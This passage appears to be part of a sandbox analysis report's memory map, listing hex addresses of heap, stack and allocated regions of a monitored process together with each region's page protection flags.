page read and write
|
||
66B1000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
5640000
|
trusted library allocation
|
page read and write
|
||
3691000
|
heap
|
page read and write
|
||
32C9000
|
heap
|
page read and write
|
||
321B000
|
heap
|
page read and write
|
||
7A6000
|
heap
|
page read and write
|
||
5570000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
778A000
|
heap
|
page read and write
|
||
D10000
|
unkown
|
page readonly
|
||
958D000
|
stack
|
page read and write
|
||
32CE000
|
stack
|
page read and write
|
||
9E0000
|
heap
|
page read and write
|
||
84F0000
|
trusted library allocation
|
page read and write
|
||
FF391FA000
|
stack
|
page read and write
|
||
4580000
|
direct allocation
|
page read and write
|
||
2A3F000
|
stack
|
page read and write
|
||
8150000
|
trusted library allocation
|
page read and write
|
||
7B4000
|
heap
|
page read and write
|
||
4370000
|
direct allocation
|
page execute and read and write
|
||
9E3839E000
|
stack
|
page read and write
|
||
3D21000
|
trusted library allocation
|
page read and write
|
||
2BE1743E000
|
trusted library allocation
|
page read and write
|
||
2D40000
|
heap
|
page read and write
|
||
3E30000
|
direct allocation
|
page execute and read and write
|
||
3C19000
|
heap
|
page read and write
|
||
2BE176D4000
|
heap
|
page read and write
|
||
2498000
|
direct allocation
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
32C8000
|
heap
|
page read and write
|
||
4FDE000
|
stack
|
page read and write
|
||
3630000
|
direct allocation
|
page execute and read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
F3B000
|
heap
|
page read and write
|
||
FF39EFE000
|
unkown
|
page readonly
|
||
7B2A000
|
heap
|
page read and write
|
||
19B000
|
stack
|
page read and write
|
||
1B10000
|
heap
|
page read and write
|
||
3211000
|
heap
|
page read and write
|
||
1ADC000
|
heap
|
page read and write
|
||
8150000
|
trusted library allocation
|
page read and write
|
||
4160000
|
direct allocation
|
page execute and read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
500A000
|
trusted library allocation
|
page read and write
|
||
F00000
|
trusted library allocation
|
page read and write
|
||
8B98000
|
direct allocation
|
page read and write
|
||
33CA000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
35E0000
|
trusted library allocation
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
7785000
|
heap
|
page read and write
|
||
7FD49000
|
direct allocation
|
page read and write
|
||
549D000
|
heap
|
page read and write
|
||
FF39E7E000
|
stack
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
9CA000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
2C7B000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
2F70000
|
heap
|
page read and write
|
||
2EFC000
|
stack
|
page read and write
|
||
34F0000
|
heap
|
page read and write
|
||
2BE12102000
|
heap
|
page read and write
|
||
2EE0000
|
heap
|
page read and write
|
||
2BE17486000
|
trusted library allocation
|
page read and write
|
||
2AAE000
|
heap
|
page read and write
|
||
778A000
|
heap
|
page read and write
|
||
2A90000
|
heap
|
page read and write
|
||
2EC0000
|
remote allocation
|
page read and write
|
||
3C21000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
2BE17590000
|
trusted library allocation
|
page read and write
|
||
1B31000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
312F000
|
stack
|
page read and write
|
||
3C1D000
|
heap
|
page read and write
|
||
3C1D000
|
heap
|
page read and write
|
||
12D5000
|
heap
|
page read and write
|
||
158000
|
stack
|
page read and write
|
||
288E000
|
stack
|
page read and write
|
||
401000
|
unkown
|
page execute and write copy
|
||
33C0000
|
heap
|
page read and write
|
||
4AD000
|
stack
|
page read and write
|
||
12D1000
|
heap
|
page read and write
|
||
F9E000
|
unkown
|
page write copy
|
||
66E8000
|
heap
|
page read and write
|
||
3A00000
|
direct allocation
|
page execute and read and write
|
||
5B0000
|
heap
|
page read and write
|
||
3460000
|
heap
|
page read and write
|
||
32C3000
|
direct allocation
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
12E1000
|
heap
|
page read and write
|
||
3800000
|
direct allocation
|
page execute and read and write
|
||
36CD000
|
direct allocation
|
page read and write
|
||
2BD0000
|
heap
|
page read and write
|
||
321B000
|
heap
|
page read and write
|
||
4200000
|
direct allocation
|
page execute and read and write
|
||
349D000
|
heap
|
page read and write
|
||
3690000
|
direct allocation
|
page execute and read and write
|
||
4623000
|
direct allocation
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
2CB7000
|
heap
|
page read and write
|
||
34AD000
|
heap
|
page read and write
|
||
D11000
|
unkown
|
page execute read
|
||
33B0000
|
heap
|
page read and write
|
||
A83D000
|
stack
|
page read and write
|
||
2BE17702000
|
heap
|
page read and write
|
||
778B000
|
heap
|
page read and write
|
||
2BA0000
|
trusted library allocation
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
2FE0000
|
heap
|
page read and write
|
||
128D000
|
stack
|
page read and write
|
||
33A0000
|
direct allocation
|
page execute and read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
3A80000
|
direct allocation
|
page execute and read and write
|
||
6CB3000
|
direct allocation
|
page read and write
|
||
1B11000
|
heap
|
page read and write
|
||
861E000
|
direct allocation
|
page read and write
|
||
538000
|
unkown
|
page readonly
|
||
1B21000
|
heap
|
page read and write
|
||
8590000
|
trusted library allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
1066000
|
unkown
|
page write copy
|
||
35C0000
|
direct allocation
|
page execute and read and write
|
||
A5FE000
|
stack
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
3DE0000
|
direct allocation
|
page execute and read and write
|
||
1AFE000
|
heap
|
page read and write
|
||
34D0000
|
heap
|
page read and write
|
||
775000
|
heap
|
page read and write
|
||
2BE17560000
|
trusted library allocation
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
2474000
|
direct allocation
|
page read and write
|
||
2BE17655000
|
heap
|
page read and write
|
||
4F90000
|
heap
|
page read and write
|
||
2CB1000
|
heap
|
page read and write
|
||
2BCD000
|
trusted library allocation
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
31B0000
|
direct allocation
|
page read and write
|
||
2BE17663000
|
heap
|
page read and write
|
||
1B11000
|
heap
|
page read and write
|
||
1B2C000
|
heap
|
page read and write
|
||
36B0000
|
direct allocation
|
page execute and read and write
|
||
55EE000
|
stack
|
page read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
2CB5000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
1AFE000
|
heap
|
page read and write
|
||
1B0A000
|
heap
|
page read and write
|
||
306E000
|
stack
|
page read and write
|
||
3C1A000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
7AB0000
|
heap
|
page read and write
|
||
12EE000
|
stack
|
page read and write
|
||
31CF000
|
stack
|
page read and write
|
||
3495000
|
direct allocation
|
page read and write
|
||
3C25000
|
heap
|
page read and write
|
||
3497000
|
heap
|
page read and write
|
||
345B000
|
direct allocation
|
page read and write
|
||
4556000
|
direct allocation
|
page read and write
|
||
2DFF000
|
stack
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
32E1000
|
direct allocation
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
16F0000
|
direct allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
F30000
|
heap
|
page read and write
|
||
7717000
|
heap
|
page read and write
|
||
77F1000
|
heap
|
page read and write
|
||
1AF3000
|
heap
|
page read and write
|
||
1B15000
|
heap
|
page read and write
|
||
34D6000
|
direct allocation
|
page read and write
|
||
2BE12113000
|
heap
|
page read and write
|
||
2BE12E40000
|
trusted library section
|
page readonly
|
||
890000
|
unkown
|
page execute and write copy
|
||
1458000
|
heap
|
page read and write
|
||
2BE12E50000
|
trusted library section
|
page readonly
|
||
5AEE000
|
stack
|
page read and write
|
||
8AA3000
|
direct allocation
|
page read and write
|
||
7611000
|
heap
|
page read and write
|
||
1910000
|
heap
|
page read and write
|
||
343F000
|
direct allocation
|
page read and write
|
||
7CE000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
2291000
|
direct allocation
|
page read and write
|
||
3E10000
|
direct allocation
|
page execute and read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
2FE0000
|
heap
|
page read and write
|
||
1C50000
|
heap
|
page read and write
|
||
2BE17500000
|
trusted library allocation
|
page read and write
|
||
3910000
|
direct allocation
|
page execute and read and write
|
||
400000
|
unkown
|
page readonly
|
||
3320000
|
direct allocation
|
page read and write
|
||
4F40000
|
heap
|
page read and write
|
||
66E6000
|
heap
|
page read and write
|
||
7FDDB000
|
direct allocation
|
page read and write
|
||
2E06000
|
trusted library allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
1717000
|
heap
|
page read and write
|
||
4120000
|
direct allocation
|
page execute and read and write
|
||
2757000
|
direct allocation
|
page read and write
|
||
2B3C000
|
stack
|
page read and write
|
||
640000
|
heap
|
page read and write
|
||
50D000
|
unkown
|
page write copy
|
||
6BB0000
|
direct allocation
|
page read and write
|
||
7721000
|
heap
|
page read and write
|
||
30E6000
|
heap
|
page read and write
|
||
12D5000
|
heap
|
page read and write
|
||
106B000
|
unkown
|
page readonly
|
||
2840000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
D10000
|
unkown
|
page readonly
|
||
8FD000
|
stack
|
page read and write
|
||
37C0000
|
direct allocation
|
page execute and read and write
|
||
2EEA000
|
heap
|
page read and write
|
||
44A0000
|
direct allocation
|
page read and write
|
||
1717000
|
heap
|
page read and write
|
||
3D90000
|
direct allocation
|
page execute and read and write
|
||
188C000
|
heap
|
page read and write
|
||
8B90000
|
direct allocation
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
998D000
|
stack
|
page read and write
|
||
3090000
|
heap
|
page read and write
|
||
2BE12F80000
|
trusted library allocation
|
page read and write
|
||
86A9000
|
direct allocation
|
page read and write
|
||
2F2D000
|
stack
|
page read and write
|
||
5EA000
|
unkown
|
page readonly
|
||
732000
|
heap
|
page read and write
|
||
33B0000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
670000
|
heap
|
page read and write
|
||
2BE1749C000
|
trusted library allocation
|
page read and write
|
||
8E4000
|
unkown
|
page execute and write copy
|
||
1AFE000
|
heap
|
page read and write
|
||
31AA000
|
heap
|
page read and write
|
||
1B11000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
86EC000
|
direct allocation
|
page read and write
|
||
1555000
|
heap
|
page read and write
|
||
7717000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
5014000
|
trusted library allocation
|
page read and write
|
||
12DC000
|
heap
|
page read and write
|
||
D11000
|
unkown
|
page execute read
|
||
2FE4000
|
heap
|
page read and write
|
||
2BC6000
|
trusted library allocation
|
page read and write
|
||
2BE120B4000
|
heap
|
page read and write
|
||
33F0000
|
heap
|
page read and write
|
||
7721000
|
heap
|
page read and write
|
||
3CE0000
|
direct allocation
|
page execute and read and write
|
||
3472000
|
heap
|
page read and write
|
||
12DB000
|
heap
|
page read and write
|
||
75E000
|
stack
|
page read and write
|
||
6640000
|
direct allocation
|
page execute and read and write
|
||
2BF0000
|
heap
|
page read and write
|
||
3170000
|
heap
|
page read and write
|
||
8B64000
|
direct allocation
|
page read and write
|
||
34C3000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
2C00000
|
trusted library allocation
|
page read and write
|
||
870C000
|
direct allocation
|
page read and write
|
||
3498000
|
heap
|
page read and write
|
||
8639000
|
direct allocation
|
page read and write
|
||
77F1000
|
heap
|
page read and write
|
||
2E29000
|
trusted library allocation
|
page read and write
|
||
39D0000
|
direct allocation
|
page execute and read and write
|
||
7B6000
|
heap
|
page read and write
|
||
175000
|
stack
|
page read and write
|
||
305F000
|
stack
|
page read and write
|
||
761000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
18CF000
|
stack
|
page read and write
|
||
348B000
|
heap
|
page read and write
|
||
D1F000
|
stack
|
page read and write
|
||
4080000
|
direct allocation
|
page execute and read and write
|
||
4280000
|
direct allocation
|
page execute and read and write
|
||
23B0000
|
heap
|
page read and write
|
||
83F000
|
stack
|
page read and write
|
||
2FC0000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
4541000
|
direct allocation
|
page read and write
|
||
4310000
|
direct allocation
|
page execute and read and write
|
||
2FEB000
|
stack
|
page read and write
|
||
8520000
|
trusted library allocation
|
page read and write
|
||
2FD0000
|
heap
|
page read and write
|
||
CF0000
|
heap
|
page read and write
|
||
8CCD000
|
direct allocation
|
page read and write
|
||
7DC000
|
heap
|
page read and write
|
||
33E0000
|
direct allocation
|
page execute and read and write
|
||
2970000
|
heap
|
page read and write
|
||
7784000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
12DB000
|
heap
|
page read and write
|
||
34D0000
|
direct allocation
|
page read and write
|
||
778A000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
2BE1291A000
|
heap
|
page read and write
|
||
12E0000
|
heap
|
page read and write
|
||
333E000
|
stack
|
page read and write
|
||
3411000
|
direct allocation
|
page read and write
|
||
52F0000
|
trusted library allocation
|
page execute and read and write
|
||
2BE17713000
|
heap
|
page read and write
|
||
86BE000
|
direct allocation
|
page read and write
|
||
1B1C000
|
heap
|
page read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
3650000
|
heap
|
page read and write
|
||
18F2000
|
heap
|
page read and write
|
||
5780000
|
heap
|
page read and write
|
||
1AE9000
|
heap
|
page read and write
|
||
3C1F000
|
heap
|
page read and write
|
||
2BE17510000
|
trusted library allocation
|
page read and write
|
||
4F2E000
|
stack
|
page read and write
|
||
106B000
|
unkown
|
page readonly
|
||
38F0000
|
direct allocation
|
page execute and read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
2CC1000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
12D5000
|
heap
|
page read and write
|
||
BD0000
|
heap
|
page read and write
|
||
11D0000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
30FB000
|
stack
|
page read and write
|
||
6B1C000
|
stack
|
page read and write
|
||
7D10000
|
trusted library allocation
|
page read and write
|
||
3471000
|
heap
|
page read and write
|
||
3CC0000
|
direct allocation
|
page execute and read and write
|
||
1290000
|
heap
|
page read and write
|
||
36C6000
|
direct allocation
|
page read and write
|
||
35B0000
|
direct allocation
|
page execute and read and write
|
||
D10000
|
unkown
|
page readonly
|
||
1B1A000
|
heap
|
page read and write
|
||
106B000
|
unkown
|
page readonly
|
||
3380000
|
direct allocation
|
page execute and read and write
|
||
2C05000
|
trusted library allocation
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
3480000
|
heap
|
page read and write
|
||
4FF6000
|
trusted library allocation
|
page read and write
|
||
1450000
|
heap
|
page read and write
|
||
B80000
|
heap
|
page read and write
|
||
4E8E000
|
stack
|
page read and write
|
||
1F3AE570000
|
heap
|
page read and write
|
||
3390000
|
direct allocation
|
page execute and read and write
|
||
4E1D000
|
stack
|
page read and write
|
||
2F0D000
|
stack
|
page read and write
|
||
6621000
|
direct allocation
|
page read and write
|
||
33B8000
|
heap
|
page read and write
|
||
7A4F000
|
stack
|
page read and write
|
||
346F000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
FA2000
|
unkown
|
page readonly
|
||
1F3AE3A8000
|
heap
|
page read and write
|
||
7D8C000
|
heap
|
page read and write
|
||
40C0000
|
direct allocation
|
page execute and read and write
|
||
61E9B000
|
unkown
|
page read and write
|
||
1AE4000
|
heap
|
page read and write
|
||
3B80000
|
direct allocation
|
page execute and read and write
|
||
2F2C000
|
heap
|
page read and write
|
||
4290000
|
direct allocation
|
page execute and read and write
|
||
309E000
|
stack
|
page read and write
|
||
301E000
|
stack
|
page read and write
|
||
7725000
|
heap
|
page read and write
|
||
34B1000
|
heap
|
page read and write
|
||
331E000
|
stack
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
520000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
5030000
|
heap
|
page read and write
|
||
11D0000
|
heap
|
page read and write
|
||
7F0000
|
heap
|
page read and write
|
||
4340000
|
direct allocation
|
page execute and read and write
|
||
3460000
|
heap
|
page read and write
|
||
2F56000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
22F8000
|
direct allocation
|
page read and write
|
||
36C0000
|
remote allocation
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
41C000
|
stack
|
page read and write
|
||
2DCD000
|
stack
|
page read and write
|
||
3660000
|
heap
|
page read and write
|
||
5AD000
|
unkown
|
page read and write
|
||
3A60000
|
direct allocation
|
page execute and read and write
|
||
45C000
|
stack
|
page read and write
|
||
6670000
|
heap
|
page read and write
|
||
3472000
|
heap
|
page read and write
|
||
2BE120FD000
|
heap
|
page read and write
|
||
FF393FE000
|
unkown
|
page readonly
|
||
3565000
|
heap
|
page read and write
|
||
8850000
|
trusted library allocation
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
7D8000
|
heap
|
page read and write
|
||
5A1000
|
unkown
|
page write copy
|
||
930000
|
heap
|
page read and write
|
||
1A8207B000
|
stack
|
page read and write
|
||
3560000
|
direct allocation
|
page execute and read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
106B000
|
unkown
|
page readonly
|
||
5BEF000
|
stack
|
page read and write
|
||
9AE0000
|
trusted library allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
85CB000
|
direct allocation
|
page read and write
|
||
2434000
|
direct allocation
|
page read and write
|
||
7FE3C000
|
direct allocation
|
page read and write
|
||
12BE000
|
heap
|
page read and write
|
||
7C6000
|
heap
|
page read and write
|
||
22EA000
|
direct allocation
|
page read and write
|
||
34D9000
|
direct allocation
|
page read and write
|
||
7A1000
|
heap
|
page read and write
|
||
3590000
|
direct allocation
|
page execute and read and write
|
||
4F7E000
|
stack
|
page read and write
|
||
39C0000
|
direct allocation
|
page execute and read and write
|
||
454F000
|
direct allocation
|
page read and write
|
||
37B0000
|
direct allocation
|
page execute and read and write
|
||
33A4000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
18DA000
|
heap
|
page read and write
|
||
2EE8000
|
trusted library allocation
|
page read and write
|
||
3710000
|
direct allocation
|
page execute and read and write
|
||
7721000
|
heap
|
page read and write
|
||
10D000
|
stack
|
page read and write
|
||
4D21000
|
direct allocation
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
2BE1206F000
|
heap
|
page read and write
|
||
4CB0000
|
direct allocation
|
page read and write
|
||
7724000
|
heap
|
page read and write
|
||
3F30000
|
direct allocation
|
page execute and read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
184E000
|
heap
|
page read and write
|
||
1B25000
|
heap
|
page read and write
|
||
4170000
|
direct allocation
|
page execute and read and write
|
||
7FD50000
|
direct allocation
|
page read and write
|
||
8E000
|
stack
|
page read and write
|
||
40D0000
|
direct allocation
|
page execute and read and write
|
||
7784000
|
heap
|
page read and write
|
||
344F000
|
stack
|
page read and write
|
||
E60000
|
heap
|
page read and write
|
||
2329000
|
heap
|
page read and write
|
||
2C9E000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
4902000
|
direct allocation
|
page read and write
|
||
34A4000
|
heap
|
page read and write
|
||
1B25000
|
heap
|
page read and write
|
||
8ECE000
|
stack
|
page read and write
|
||
41A0000
|
direct allocation
|
page execute and read and write
|
||
303C000
|
stack
|
page read and write
|
||
5F0000
|
heap
|
page read and write
|
||
2EE3000
|
heap
|
page read and write
|
||
5880000
|
trusted library allocation
|
page execute and read and write
|
||
7D73000
|
heap
|
page read and write
|
||
3486000
|
heap
|
page read and write
|
||
22BF000
|
direct allocation
|
page read and write
|
||
7721000
|
heap
|
page read and write
|
||
54CF000
|
stack
|
page read and write
|
||
502000
|
unkown
|
page write copy
|
||
66B1000
|
heap
|
page read and write
|
||
1295C160000
|
remote allocation
|
page read and write
|
||
500A000
|
trusted library allocation
|
page read and write
|
||
311C000
|
heap
|
page read and write
|
||
7BD000
|
stack
|
page read and write
|
||
4FF6000
|
trusted library allocation
|
page read and write
|
||
2AF8000
|
stack
|
page read and write
|
||
2C10000
|
heap
|
page read and write
|
||
33F7000
|
direct allocation
|
page read and write
|
||
2E08000
|
heap
|
page read and write
|
||
2EEA000
|
heap
|
page read and write
|
||
87FD000
|
direct allocation
|
page read and write
|
||
A93E000
|
stack
|
page read and write
|
||
302E000
|
stack
|
page read and write
|
||
5AF000
|
unkown
|
page write copy
|
||
700000
|
heap
|
page read and write
|
||
980E000
|
stack
|
page read and write
|
||
44CC000
|
direct allocation
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
31E0000
|
heap
|
page read and write
|
||
5731000
|
heap
|
page read and write
|
||
34A2000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
599E000
|
stack
|
page read and write
|
||
7786000
|
heap
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
1ADC000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
31AA000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
34C3000
|
heap
|
page read and write
|
||
2BE17537000
|
trusted library allocation
|
page read and write
|
||
3380000
|
heap
|
page read and write
|
||
1295C160000
|
remote allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
914E000
|
stack
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
745000
|
heap
|
page read and write
|
||
34E2000
|
direct allocation
|
page read and write
|
||
FF38CFE000
|
unkown
|
page readonly
|
||
5010000
|
trusted library allocation
|
page read and write
|
||
871C000
|
direct allocation
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
4F5E000
|
stack
|
page read and write
|
||
5461000
|
heap
|
page read and write
|
||
3556000
|
heap
|
page read and write
|
||
1295C1DB000
|
heap
|
page read and write
|
||
3326000
|
heap
|
page read and write
|
||
2570000
|
direct allocation
|
page read and write
|
||
2F80000
|
heap
|
page read and write
|
||
2A7E000
|
stack
|
page read and write
|
||
FF390FE000
|
unkown
|
page readonly
|
||
D11000
|
unkown
|
page execute read
|
||
1C5A000
|
heap
|
page read and write
|
||
1066000
|
unkown
|
page read and write
|
||
938E000
|
stack
|
page read and write
|
||
5730000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
2FCE000
|
stack
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
1B25000
|
heap
|
page read and write
|
||
2BE1206B000
|
heap
|
page read and write
|
||
7734000
|
heap
|
page read and write
|
||
34AB000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
34DD000
|
direct allocation
|
page read and write
|
||
1F3AE380000
|
heap
|
page read and write
|
||
5461000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
303B000
|
heap
|
page read and write
|
||
1FF66410000
|
heap
|
page read and write
|
||
39F0000
|
direct allocation
|
page execute and read and write
|
||
2BE17410000
|
trusted library allocation
|
page read and write
|
||
1F3AE3A0000
|
heap
|
page read and write
|
||
3558000
|
heap
|
page read and write
|
||
1716000
|
heap
|
page read and write
|
||
EAE000
|
stack
|
page read and write
|
||
12D5000
|
heap
|
page read and write
|
||
6F22000
|
trusted library allocation
|
page read and write
|
||
34E9000
|
heap
|
page read and write
|
||
73D000
|
heap
|
page read and write
|
||
41C000
|
unkown
|
page readonly
|
||
840000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
8A98000
|
direct allocation
|
page read and write
|
||
F9E000
|
unkown
|
page read and write
|
||
33A0000
|
heap
|
page read and write
|
||
66ED000
|
heap
|
page read and write
|
||
4440000
|
direct allocation
|
page execute and read and write
|
||
35EF000
|
stack
|
page read and write
|
||
4ED0000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
799000
|
heap
|
page read and write
|
||
224B000
|
direct allocation
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
5770000
|
heap
|
page read and write
|
||
25FE000
|
stack
|
page read and write
|
||
3750000
|
direct allocation
|
page execute and read and write
|
||
5B3000
|
unkown
|
page read and write
|
||
37A0000
|
direct allocation
|
page execute and read and write
|
||
1142000
|
trusted library allocation
|
page read and write
|
||
3FF0000
|
direct allocation
|
page execute and read and write
|
||
33A4000
|
heap
|
page read and write
|
||
D10000
|
unkown
|
page readonly
|
||
A73C000
|
stack
|
page read and write
|
||
4ED000
|
stack
|
page read and write
|
||
8FF000
|
stack
|
page read and write
|
||
91B000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
341E000
|
direct allocation
|
page execute and read and write
|
||
5160000
|
trusted library allocation
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
4EE0000
|
heap
|
page read and write
|
||
2DBF000
|
stack
|
page read and write
|
||
3609000
|
heap
|
page read and write
|
||
3478000
|
direct allocation
|
page read and write
|
||
3700000
|
direct allocation
|
page execute and read and write
|
||
5650000
|
trusted library allocation
|
page read and write
|
||
7721000
|
heap
|
page read and write
|
||
7723000
|
heap
|
page read and write
|
||
2DCD000
|
trusted library allocation
|
page read and write
|
||
2CB0000
|
heap
|
page read and write
|
||
32C7000
|
direct allocation
|
page read and write
|
||
36DC000
|
direct allocation
|
page read and write
|
||
3C30000
|
direct allocation
|
page execute and read and write
|
||
3559000
|
heap
|
page read and write
|
||
2BA0000
|
heap
|
page read and write
|
||
34AC000
|
direct allocation
|
page read and write
|
||
34EE000
|
heap
|
page read and write
|
||
7735000
|
heap
|
page read and write
|
||
8520000
|
trusted library allocation
|
page read and write
|
||
4390000
|
direct allocation
|
page execute and read and write
|
||
37FF000
|
stack
|
page read and write
|
||
1B14000
|
heap
|
page read and write
|
||
950E000
|
stack
|
page read and write
|
||
2BE1762D000
|
heap
|
page read and write
|
||
2BE1291B000
|
heap
|
page read and write
|
||
2CAA000
|
heap
|
page read and write
|
||
114B000
|
trusted library allocation
|
page execute and read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
2C6F000
|
stack
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
8690000
|
direct allocation
|
page read and write
|
||
1FF662F9000
|
heap
|
page read and write
|
||
61E88000
|
unkown
|
page read and write
|
||
129B000
|
heap
|
page read and write
|
||
3647000
|
heap
|
page read and write
|
||
9C8000
|
heap
|
page read and write
|
||
3C14000
|
heap
|
page read and write
|
||
1B0E000
|
heap
|
page read and write
|
||
534000
|
unkown
|
page readonly
|
||
2E00000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
2408000
|
direct allocation
|
page read and write
|
||
3D80000
|
direct allocation
|
page execute and read and write
|
||
129C000
|
heap
|
page read and write
|
||
189F000
|
heap
|
page read and write
|
||
4DA7000
|
direct allocation
|
page read and write
|
||
8649000
|
direct allocation
|
page read and write
|
||
7C3000
|
heap
|
page read and write
|
||
2BE11F50000
|
heap
|
page read and write
|
||
7611000
|
heap
|
page read and write
|
||
3970000
|
direct allocation
|
page execute and read and write
|
||
240F000
|
direct allocation
|
page read and write
|
||
B70000
|
heap
|
page read and write
|
||
918000
|
heap
|
page read and write
|
||
180000
|
stack
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
863000
|
unkown
|
page execute and read and write
|
||
35DF000
|
stack
|
page read and write
|
||
7734000
|
heap
|
page read and write
|
||
2EDC000
|
stack
|
page read and write
|
||
7717000
|
heap
|
page read and write
|
||
34D8000
|
heap
|
page read and write
|
||
34AE000
|
heap
|
page read and write
|
||
2440000
|
direct allocation
|
page read and write
|
||
D70000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
4010000
|
direct allocation
|
page execute and read and write
|
||
4810000
|
heap
|
page read and write
|
||
347F000
|
direct allocation
|
page read and write
|
||
36D0000
|
heap
|
page read and write
|
||
412000
|
unkown
|
page write copy
|
||
318E000
|
stack
|
page read and write
|
||
2BE17448000
|
trusted library allocation
|
page read and write
|
||
54E000
|
stack
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
6DE000
|
stack
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
2BE12802000
|
heap
|
page read and write
|
||
1ADF000
|
stack
|
page read and write
|
||
3653000
|
heap
|
page read and write
|
||
3850000
|
direct allocation
|
page execute and read and write
|
||
87FF000
|
direct allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
7734000
|
heap
|
page read and write
|
||
2CBB000
|
heap
|
page read and write
|
||
778B000
|
heap
|
page read and write
|
||
33F2000
